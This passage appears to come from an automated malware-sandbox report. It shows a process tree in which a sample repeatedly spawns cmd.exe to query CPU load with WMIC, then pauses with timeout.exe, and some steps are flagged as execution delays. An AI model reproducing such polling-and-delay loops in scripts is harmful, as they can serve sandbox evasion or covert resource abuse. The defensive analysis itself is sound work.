- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3808
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4812
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:692
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:816
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2832
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:96
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2256
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2952
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2624
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4708
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2784
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1152
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:700
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3724
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3240
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:816
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:228
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1492
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4152
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5048
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1464
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4808
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:700
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3896
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:816
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:96
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5088
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3028
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1072
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2796
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3088
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4340
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2852
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
